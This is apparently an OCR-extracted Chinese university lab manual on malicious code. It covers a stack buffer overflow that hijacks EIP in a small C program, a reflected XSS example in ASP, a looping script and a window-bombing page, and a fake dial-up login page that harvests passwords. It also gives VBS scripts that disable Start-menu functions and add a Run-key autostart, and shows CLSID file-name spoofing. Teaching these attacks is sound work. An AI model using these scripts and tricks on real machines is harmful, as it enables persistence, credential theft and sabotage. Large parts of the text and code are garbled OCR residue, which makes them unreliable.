實(shí)驗(yàn)四 惡意代碼實(shí)驗(yàn)

實(shí)驗(yàn)四惡意代碼攻防實(shí)驗(yàn)【實(shí)驗(yàn)?zāi)康摹客ㄟ^本實(shí)驗(yàn)初步了解遠(yuǎn)程控制軟件的編寫方法,了解黑客利用流行的木馬軟件進(jìn)行遠(yuǎn)程監(jiān)控和攻擊的方法，掌握常見工具的基本應(yīng)用，包括如下幾個(gè)方面：掌握基于Socket的網(wǎng)絡(luò)編程.了解緩沖區(qū)溢出攻擊的基本實(shí)現(xiàn)方法。了解惡意腳本攻擊的基本實(shí)現(xiàn)方法。?了解網(wǎng)絡(luò)病毒的基本特性。實(shí)驗(yàn)過程中，學(xué)生需要將實(shí)驗(yàn)的結(jié)果記錄下來,并回答相關(guān)思考題，填寫到實(shí)驗(yàn)報(bào)告中?！緦?shí)驗(yàn)類型】綜合型實(shí)驗(yàn)【實(shí)驗(yàn)內(nèi)容】以下實(shí)驗(yàn)內(nèi)容可根據(jù)實(shí)驗(yàn)室的具體情況和課時(shí)安排的變化進(jìn)行適當(dāng)?shù)恼{(diào)整，實(shí)驗(yàn)內(nèi)容中的思考題以書面形式解答并附在實(shí)驗(yàn)報(bào)告的后面.需要注意的是，學(xué)生在實(shí)驗(yàn)過程中要嚴(yán)格按實(shí)驗(yàn)指導(dǎo)書的操作步驟和要求操作，且小組成員應(yīng)緊密配合，以保證實(shí)驗(yàn)過程能夠順利完成。本次實(shí)驗(yàn)的主要項(xiàng)目包括以下幾個(gè)方面:0溢出攻擊模擬程序的編寫、調(diào)試；0跨站惡意腳本的運(yùn)用；0網(wǎng)頁腳本攻擊。具體的實(shí)驗(yàn)內(nèi)容和步驟如下：【實(shí)驗(yàn)環(huán)境】實(shí)驗(yàn)設(shè)備：WindowsXP系統(tǒng)，VMWare系統(tǒng)，Windows2000/XP虛擬機(jī)。一、緩沖區(qū)溢出攻擊編寫簡單的溢出攻擊程序，編譯后分別在實(shí)驗(yàn)主機(jī)和虛擬機(jī)中運(yùn)行。1．簡單原理示例VC環(huán)境下編譯以下代碼：#include〈stdio。h〉#include<string.h>charname［］=”abcdefghijklmnopqrstuvwxyz”；intmain(){charbuffer［8］；strcpy(buffer,name)；return0;}運(yùn)行編譯后的程序,會(huì)出現(xiàn)系統(tǒng)下圖警告,點(diǎn)擊“調(diào)試”按鈕，根據(jù)返回的偏移值可推斷出溢出的部位.ezaaplel.esceK8inplel.exe遛到問題有要關(guān)閉.我們對(duì)此引起的不便表示拖薪如果囪正處于進(jìn)程當(dāng)中j信息有可能丟失.請(qǐng)將此問題報(bào)告給Microsoft此報(bào)告視為保密的和匿名的.我們已經(jīng)創(chuàng)建了一個(gè)錯(cuò)誤報(bào)告，您可以將它發(fā)送給我們.我們將此報(bào)告視為保密的和匿名的.要查看這個(gè)錯(cuò)誤報(bào)告包含的勘據(jù)> 請(qǐng)單擊此處了調(diào)試?調(diào)試?I發(fā)送錯(cuò)誤報(bào)告應(yīng)）I不發(fā)送魴example1.exc錯(cuò)諼簽名MuUS：djrig：unkrLijwnjlppffjjjripMuUS：djrig：unkrLijwnModder：0.□.0.0Offset：T06ffie6d2.溢出攻擊模擬示例實(shí)驗(yàn)需要使用以下工具：OllyDBUedit首先寫一個(gè)C++程序2。c，源碼：#include“iostream。h”intmain（）{charname[8];cout〈〈“Pleasetypeyourname："；cin〉〉name；cout〈<"Hello,";cout〈〈name;cout<<“\n”；return0；}賦值一個(gè)名為name的字符類型數(shù)組（字符串），其內(nèi)容空間為8個(gè)字節(jié)，運(yùn)行程序時(shí)首先提示使用者輸入你的名字，當(dāng)輸入后將該值吸入給name,然后以“Hello,你的名字\n""的方式輸出。使用VC的lc編譯該程序（編譯后的程序?yàn)?.exe）后，運(yùn)行…此時(shí)若“你的名字”小于或等于8個(gè)字節(jié)時(shí)程序當(dāng)然能正常運(yùn)行了,但若超過8個(gè)字節(jié)時(shí)將出現(xiàn)：

2.exe2.ex.遇到問題需要關(guān)閉.我們對(duì)此引起的不便表示抱歉口如果您正處于進(jìn)程當(dāng)中，信息有可能丟失口請(qǐng)將此問題報(bào)告給Microsoftn我們已經(jīng)創(chuàng)建了一個(gè)錯(cuò)誤報(bào)告，您可以將它發(fā)送給我們口我們將此報(bào)告視為保密的和匿名的口要查看這個(gè)錯(cuò)誤報(bào)告包含的數(shù)據(jù)， 話單擊此處口此報(bào)告視為保密的和匿名的口調(diào)試聞發(fā)送錯(cuò)誤報(bào)告⑵:不發(fā)若?…;這次我們要做的實(shí)驗(yàn)就是讓該程序溢出并能跳轉(zhuǎn)到程序的開頭重新運(yùn)行該程序.首先我們運(yùn)行發(fā)送錯(cuò)誤報(bào)告⑵:不發(fā)若?…;"aaabbbcccdddeeefff",在彈出的對(duì)話框中按“調(diào)試”按鈕（這里我是用OllyDB作為系統(tǒng)的主調(diào)試器的）進(jìn)入OllyDB調(diào)試模式：CllyltTE-3.me[CPU-主學(xué)程]Gommard")工回12FF日日|wwwa.3^。國后皿口囹交伴口SS?咖卯新伴心JtMQ）Gommard")工回12FF日日|wwwa.3^。國后皿口方向4虹：正在執(zhí)爺：■;ii-0&65]-使用vi，ft-F,?F?/-??；?：：?略程序【聲這里我們發(fā)現(xiàn)負(fù)責(zé)下一跳的EIP寄存器的值被覆蓋了，其值為66656565,對(duì)照ascii表后發(fā)現(xiàn)其值為“feee",由于寄存器是‘倒轉(zhuǎn)’的，因此其實(shí)是“eeef”覆蓋了EIP，現(xiàn)在我們可以確認(rèn)這個(gè)輸入的字符串中是從第13個(gè)字節(jié)開始覆蓋EIP的，共4個(gè)字節(jié).用OllyDB重新加載2.exe：

fOllyTCE-2.ere-[CPU-主St程，雀處-2]我們可以看到該程序起始地址為004041B0,根據(jù)字符與地址的對(duì)照關(guān)系是‘倒轉(zhuǎn)’的原理:004041B0等于B0414000此時(shí)打開UltraEdit,輸入1,然后按Ctrl+H切換到HEX顯示模式，然后在HEX輸出界面中輸入B0414000:iIHEHtfK!:asiIHEHtfK!:as舊弋-之踹〃1癡生片土力\ 質(zhì)\之何此時(shí)再按Ctrl+H切換回原來的輸入模式就可以得到相應(yīng)的字符了：按Ctrl+A選中該輸出的字符串，將其放在第12個(gè)字節(jié)之后，如："aaabbbcccddd靖礦現(xiàn)在我們重新啟動(dòng)按Ctrl+A選中該輸出的字符串，將其放在第12個(gè)字節(jié)之后，如："aaabbbcccddd靖礦現(xiàn)在我們重新啟動(dòng)2.exe,在輸入字符串時(shí)輸入該段字符串：，無論輸入多少次都還是“循環(huán)"，溢出成功.如圖【思考題】溢出攻擊提升權(quán)限是如何實(shí)現(xiàn)的?二、跨站腳本攻擊假設(shè)某站點(diǎn)網(wǎng)站網(wǎng)頁文件為index。asp,代碼如下：<%@Language=VBScript%>〈％IfRequest。Cookies("userName")<〉""ThenDimstrRedirectUrlstrRedirectUrl="page2.asp?userName="strRedirectUrl=strRedirectUrl&Response。Cookies("userName”)Response。Redirect(strRedirectUrl)Else％>〈HTML〉〈HEAD〉<TITLE〉MyNiceSHomePage〈/TITLE〉〈/HEAD><BODY>〈H2>MyNiceS〈/H2><FORMmethod="post”action=”page2.asp">EnteryourMyNiceSusername:〈INPUTtype="text"name=”userName”〉〈INPUTtype=”submit”name="submit”value="submit”></FORM〉〈/BODY>〈/HTML><％EndIf％〉上述代碼執(zhí)行后，調(diào)用page2。asp,回顯輸入的字符。page2。asp代碼如下：<%@Language=VBScript%>〈％DimstrUserNameIfRequest.QueryString(”userName")〈〉””ThenstrUserName=RequestoQueryString("userName")ElseResponse.Cookies("userName")=RequestoForm("userName")strUserName=RequestoForm("userName")EndIf％〉<HTML〉<HEAD〉〈/HEAD〉〈BODY〉〈H3align=”center">Hello:〈%=strUserName%>〈/H3>〈/BODY></HTML〉如果,在indexoasp中輸入〈script〉alert('Hello!!!’)；</script〉，點(diǎn)擊提交，觀察運(yùn)行結(jié)果。

【思考題】黑客利用跨站腳本攻擊可以造成哪些危害？三、惡意腳本.惡意腳本的網(wǎng)頁，交叉顯示紅色和黑色背景。代碼存為html文件，將網(wǎng)頁文件放在web目錄下，通過瀏覽器訪問該網(wǎng)頁.<html>〈body〉Test〈script〉varcolor=newArray;color[l]="black"；〃設(shè)置兩種顏色color[2]="red"；for(x=2;x<3；x++){document.bgColor=color[x];〃設(shè)置背景色if(x==2){x=0;} 〃造成死循環(huán)}〈/script〉〈body〉〈/html>

.網(wǎng)頁炸彈，也被稱為窗口轟炸，是一種極其惡劣的針對(duì)客戶端攻擊行為.以下示例可以在附帶的光盤上找到。這個(gè)示例主要針對(duì)IE瀏覽器，如圖3-93,點(diǎn)擊“網(wǎng)頁炸彈演示”的鏈接。此時(shí)，需要有一定的心理準(zhǔn)備,因?yàn)轳R上會(huì)出現(xiàn)如圖3-94的場景，而且窗口會(huì)越來越多。制止的方法只有一個(gè)，按下熱啟動(dòng)組合鍵Ctrl+Alt+Del,進(jìn)入安全對(duì)話框，迅速打開任務(wù)管理器并中止“網(wǎng)頁炸彈。htm”窗口的運(yùn)行。如果動(dòng)手比較慢的話，你的系統(tǒng)極有可能崩潰。那么，網(wǎng)頁炸彈是如何實(shí)現(xiàn)窗口轟炸的呢？觀察該頁面的源代碼就可以找到答案了，如圖。

在遭受窗口轟炸時(shí)，很容易導(dǎo)致系統(tǒng)崩潰，重新啟動(dòng)系統(tǒng)即可。3.網(wǎng)頁欺騙在附帶光盤上有筆者制作的一個(gè)有趣的網(wǎng)頁欺騙演示，如圖3—88,點(diǎn)擊其中的鏈接。圖3-88網(wǎng)頁欺騙演示屏幕彈出兩個(gè)窗口，用戶可以看見如圖3-89的提示，粗心的撥號(hào)用戶就可能認(rèn)為真的是線路中斷.然后在圖3-90界面中輸入用戶名和密碼，點(diǎn)擊撥號(hào)。圖3—89虛假的線路中斷提示

Inix|苧連接連接到163-MicrosoftInternetEuplorerInix|苧連接連接到163-MicrosoftInternetEuplorer用戶名M：密碼日wumer*保存密碼⑻取消|屬性⑼?都助（田?圖3-90模擬的撥號(hào)連接界面一旦用戶點(diǎn)擊“撥號(hào)”后，我們就可以得到他的用戶帳戶和登錄密碼。當(dāng)然，筆者的演示頁面中沒有加任何惡意代碼，可以放心瀏覽。查看第一個(gè)頁面的源代碼，如圖3—91,讀者可以了解到彈出模擬頁面的方法。圖3-91主頁面源代碼查看第二個(gè)頁面的源代碼，如圖3—92,你可以了解到模擬頁面是如何畫出來的。但兇充除Ei 舊 U%：U-503Dja?Q回國Mj111禽」國wrz<tdm>nr卬rMi^MB8 U(T001班8??<1><pal8fl?nt'> 尸 <?lIxirdir-'Q8rr^'Frwtlf11ixfda.LrLfH?卡由MF叱h?”h±-r1：30rHz+d?5c 、藐畫〕<tr> 津圖Irdhmeap-ndtkH’酩"haL|h￡"B2E"><fcnhT3Ti"B2B>inbTp用「由『Eanrl:ZEamf htl=1Mhulmitig'm工dan■~tlCtdFdtmtT:W而aii>jgxitEs=Tsrt"京j左AT>15；!=?臚*7td><Ar><tr>CtdrWtK'BlhM由t=<W?nct0EtBle*'TMais叩.$W<?i：iwrt><rantfaan.?riabheIwtiaeuradir,-i*e=■忠.％iX心P 叮f值寸:”*d>itdwadtk-rSIQ"[h<niht??U.ginHirl+ypi-~r?xErard-nM??~p?，工54Q,tr><tr>CtdwldtKPThM儂3第?><A心 產(chǎn) <+d鬲atk'?：!rhs￥ht=?351r-Wli眸此tojTA^jyrttjrpgz^diedLbKK1ff‘jWhis^iiMr*0fiie="2H>f?.W￥4S>-fkirbxeLxLj,hilMiri：3c^^icrdma9X3Ti?H2'>[，山料營諂？守fimt/『1日?<Ar>色d*LmMT-于hL如g—idrl擊由％FilFhM.匕上?丁寧》 —mutTMej*爐門h"巾3='mathi?.依配1戊1zr.書號(hào)[心與加眈&^湎^券.,"tuHmi?■■■'Er2-rl￥]<?n?iSlih:63￡hii^ht:21'.-lf；ifi,"1''hiHwi.-lilnbxp.“tutlMin3o??n°B3Briy]?"'ndlh:b]h?3{ht:2E，Jlt住EOI'￡/buirtcn.-tnlup，呼tmmjg=<：Rr曰tFlg='mathi的.MIWHI2iT；iliiaEH3燈不：<7td>.―據(jù)“J〕——FWh'rliffPL圖3-92網(wǎng)頁欺騙的部分源代碼這種欺騙代碼可以通過嵌入惡意網(wǎng)頁、郵件和共享文件夾中的。htt文件等方法，等待用戶去觸發(fā)執(zhí)行它.其欺騙行為還可以有其它的方式，如模擬QQ登錄界面、Outlook郵箱登錄界面、訪問共享時(shí)彈出的用戶驗(yàn)證窗體等,用戶必須加倍小心。當(dāng)出現(xiàn)這些界面時(shí)，一定要思量一下是否正常。.改造系統(tǒng)的“開始”菜單，禁用查找、運(yùn)行和關(guān)閉功能的腳步程序.ChangeStartMenu.vbs雙擊運(yùn)行即可。如果發(fā)現(xiàn)啟動(dòng)菜單沒有變化，則重啟系統(tǒng)后可以看到執(zhí)行效果。SubChange(Argument)ChangeStartMenu。RegWriteRegPath&Argument,Key_Data,Type_NameMsgBox("Success!”)EndSubDimChangeStartMenuSetChangeStartMenu=WScript。CreateObject("WScript。Shell”)RegPath="HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”Type_Name="REG_DWORD”Key_Data=1StartMenu_Run=”NoRun"StartMenu_Find="NoFind”StartMenu_Close="NoClose”’CallChange(StartMenu_Run)'禁用"開始”菜單中的"運(yùn)行”功能CallChange(StartMenu_Find)’禁用“開始”菜單中的“查找”功能'CallChange(StartMenu_Close)’禁用“開始”菜單中的“關(guān)閉系統(tǒng)"功能.向Windows中添加自啟動(dòng)程序，使得該程序能在系統(tǒng)開機(jī)時(shí)自動(dòng)運(yùn)行,代碼：auto。vbs,直接運(yùn)行該腳步程序，則系統(tǒng)啟動(dòng)之后會(huì)自動(dòng)運(yùn)行cmd程序。DimAutoRunProgramSetAutoRunProgram=WScript.CreateObject("WScript。Shell”)RegPath="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\”Type_Name="REG_SZ"Key_Name=,5AutoRun"Key_Data=,,C：\windows\system32\cmd.exe"'該自啟動(dòng)程序的全路徑文件名AutoRunProgramoRegWriteRegPath&Key_Name,Key_Data,Type_Name'在啟動(dòng)組中添加自啟動(dòng)程序autorun.exeMsgBox("Success!”)【思考題】惡意腳本構(gòu)成安全威脅的根本原因是什么？.文件名欺騙我們現(xiàn)在首先創(chuàng)建一個(gè)文本文件，將它的文件名命名為：test.txto{3050F4D8-98B5-11CF—BB82—00AA00BDCE0B}在該文件里面添加如圖內(nèi)容。圖3-83誘餌文件現(xiàn)在，我們通過資源管理器查看，會(huì)發(fā)現(xiàn)它顯示為test.txt,如圖。這是因?yàn)閧3050F4D8—98B5—11CF-BB82—00AA00BDCE0B}在注冊(cè)表里是htr文件關(guān)聯(lián)的CLSID(ClassID),用資源管理器和IE瀏覽器查看時(shí)并不會(huì)顯現(xiàn)出來,你看到的就是個(gè).txt文件。當(dāng)你誤認(rèn)為是一個(gè)。txt文件，而雙擊打開它時(shí)，就會(huì)被執(zhí)行，如圖.Pln.tngi92.1￡S.i?iiiultlhbyt亡/atd-nta;FranR"Ly工建」Pln.tngi92.1￡S.i?iiiultlhbyt亡/atd-nta;FranR"Ly工建」IL6H1肥plyfram -1.1Ropierfif<w192,1683」HvplyfrwiEmm ,1Ee：vlvF-ram192JlSi.1.1R亡plyfrwi172?16S.1.1Ieb^t?c-32tiPwClflinGTTL18128b界日口7總tiM<l￡inEITL=1291：byS:ea-32tinK<lffiin5TTL-12?1=bvt?=32 TTL=12Sisby*44TztiPW<iem3TTL-128Ieb^teis^32tiw<1￡JherTLs12B1：bgEgHilMFHSTTL-12?1;b^tea-32tinw：<iGmsTTL-12SR9Rlyfrwi1盟1I6gMiR？plyFrwi172,168?1Re>@ly￡ium192tlRuplyCtwi .1R?pllrEm192」6gliiRvplyFrwi172-168.1fiepliff^ttn1形』]LEgi.1E2S11I111RxiplyFwi1◎*.169.1.1R±pl>fbw .1.1Raplirfrm17Z,168.1.1R^plyFrwi172,1(9.1.1口2匕 192.1^9^1=1Replyfran1'?2?1&S.1.1Repl^rfwi192,168.1」],!、1h3i=.ai：?t': |匚―二1;b^tea-22t￡iBH：<lGinsTTL-12S1=b^ltra=32X：iM<iensTTL=12SIeb^*?E-32tiFW<lCin5TTL-1281-bjyrt;en--32t￡m《JjBme;TTL=12?1：byi:e!i-32timke<14ain5TTL-12S1=byt?=32 TTL=12S在我們的這個(gè)例子中只是啟動(dòng)了一個(gè)命令行命令Ping,并沒有什么危害性，如果運(yùn)行的是格式化、刪除文件等破壞性命令，后果就不堪設(shè)想了。其實(shí)這個(gè)文件在命令行窗口下是可以看見的，如下圖。這種欺騙的方法，還可以用在郵件的附件中，比如將一個(gè)惡意的VBS腳本裝成文本文件、圖片等，再起個(gè)吸引人的名字，引誘用戶去點(diǎn)擊。這樣就可以直接對(duì)用戶進(jìn)行攻擊，如刪除文件、格式化磁盤、安裝木馬文件、傳播病毒等。那么，針對(duì)這種欺騙如何識(shí)別和防范呢？細(xì)心一點(diǎn)可以發(fā)現(xiàn)，在資源